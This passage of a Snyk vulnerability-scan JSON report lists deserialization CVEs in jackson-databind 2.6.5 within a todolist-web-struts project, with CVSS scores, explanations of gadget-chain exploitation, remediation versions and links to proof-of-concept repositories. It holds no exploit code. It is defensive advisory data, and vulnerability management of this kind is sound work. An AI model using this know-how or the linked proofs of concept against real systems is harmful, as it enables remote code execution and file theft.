"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:01:13.013603Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:46:53.619980Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:46.857906Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.1, 2.7.9.1, 2.8.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/e8f043d1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1680)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1737)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1506612)\n", - "epssDetails": { - "percentile": "0.92802", - "probability": "0.04801", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-15095" - ], - "CWE": [ - "CWE-184" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2017-11-07T13:13:32.343000Z", - "functions_new": [ - { - "version": [ - "[,2.6.7.1)", - "[2.7,2.7.9.1)", - "[2.8,2.8.10)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2017-06-26T21:00:00Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2017-11-09T03:13:32Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:46.857906Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "credit": [ - "Imre Rad" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1855", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/irsl/jackson-rce-via-spel/", - "title": "PoC Project" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:57:20.686860Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:47:06.545272Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.597489Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the Spring libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/2235894210c75f624a3d0cd60bfb0434a20a18bf)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1855)\n- [PoC Project](https://github.com/irsl/jackson-rce-via-spel/)\n", - "epssDetails": { - "percentile": "0.95701", - "probability": "0.13977", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2017-17485" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-11T11:41:28.547000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-10T11:41:28Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-22T12:30:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:48:58.597489Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32044", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Rui Chong" - ], - "semver": { - "vulnerable": [ - "[,2.8.11)", - "[2.9.0,2.9.4)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.8.11", - "2.9.4" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1899", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:56:07.715996Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:48.440088Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:59.857985Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) and [CVE-2017-17485](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-32043)). This is exploitable via two different gadgets that bypass a blacklist.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.8.11, 2.9.4 or higher.\n## References\n- [GitHub Commit](https://github.com/GulajavaMinistudio/jackson-databind/pull/92/commits/038b471e2efde2e8f96b4e0be958d3e5a1ff1d05)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1899)\n", - "epssDetails": { - "percentile": "0.94704", - "probability": "0.09270", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-5968" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-w3f4-3q6j-rh82" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-01-22T15:40:18.105000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11)", - "[2.9,2.9.4)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-01-18T15:40:18Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-01-23T13:17:24Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:59.857985Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-32111", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.6.7.5)", - "[2.7.0, 2.8.11.1)", - "[2.9.0, 2.9.5)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.6.7.5", - "2.8.11.1", - "2.9.5" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/1931", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "critical", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 9.8, - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:59.859910Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "critical", - "baseScore": 9.8, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:48:58.671582Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:49.486075Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the `c3p0` libraries are available in the classpath.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.5, 2.8.11.1, 2.9.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/1931)\n", - "epssDetails": { - "percentile": "0.99133", - "probability": "0.93631", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2018-7489" - ], - "CWE": [ - "CWE-502" - ], - "GHSA": [ - "GHSA-cggj-fvv3-cqwv" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2018-02-26T15:13:40.723000Z", - "functions_new": [ - { - "version": [ - "[,2.8.11.1)", - "[2.9.0,2.9.5)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2018-02-10T15:13:40Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2018-02-26T15:13:40Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:53:49.486075Z", - "socialTrendAlert": false, - "packagePopularityRank": 99, - "from": [ - "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [], - "isUpgradable": false, - "isPatchable": false, - "isPinnable": false, - "isRuntime": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5", - "severityWithCritical": "high" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-450207", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.9.1", - "2.8.11.4", - "2.7.9.6" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "medium", - "cvssScore": 5.9, - "functions": [ - { - "version": [ - "[2.9.0,2.9.9.1)", - "[2.8.0,2.8.11.4)", - "[,2.7.9.6)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2341", - "title": "GitHub Issue" - }, - { - "url": "https://github.com/Al1ex/CVE-2019-12814", - "title": "PoC Repository" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "medium", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 5.9, - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "cvssV3BaseScore": 7.5, - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P", - "assigner": "Snyk", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T14:09:15.371549Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "NVD", - "severity": "medium", - "baseScore": 5.9, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:53:36.647712Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 7.5, - "cvssVersion": "3.0", - "modificationTime": "2024-03-11T09:53:50.077144Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are 